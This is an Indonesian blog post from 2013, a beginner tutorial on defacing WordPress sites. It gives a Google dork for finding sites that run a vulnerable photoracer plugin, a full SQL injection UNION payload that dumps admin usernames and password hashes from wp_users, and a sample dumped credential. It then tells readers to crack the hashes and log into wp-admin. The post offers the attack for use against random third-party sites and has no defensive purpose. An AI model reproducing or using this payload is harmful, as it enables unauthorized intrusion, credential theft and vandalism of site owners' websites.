Jumat, 29 Maret 2013

0 Cara Deface Dengan Exploit Wordpress For Newbie

~|Wahyoe|~|CreationS|~ || Artikel: Cara Deface Dengan Exploit Wordpress For Newbie
Share Gan:

cats

                Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.




1. Ketik dork berikut ke kotak pencarian google : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.

3. Tambahkan exploit ini di belakang url : +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 menjadi
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.
Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1

5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu, untuk password yang berupa MD5 bisa di crack disini

6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/

Selamat mencoba ^_^

Judul: Cara Deface Dengan Exploit Wordpress For Newbie
Rating: 100% based on 99998 ratings. 5 user reviews.
Ditulis Oleh Unknown




Di Posting Oleh Unknown, Pada 05.58 dan 0 komentar

Ditulis Oleh : YOUR NAME | YOUR DESCRIPTION

Anda sedang membaca sebuah artikel yang berjudul Cara Deface Dengan Exploit Wordpress For Newbie. Dengan url http://wahyoecrea.blogspot.com/2013/03/cara-deface-dengan-exploit-wordpress.html. Jika anda suka dengan artikel ini silahkan ambil dengan syarat Sertakan Sumbernya. Jika anda ingin meng copy-paste tolong berikan sumbernya dan baca terlebih dahulu .

:: Thank's for visiting ! ::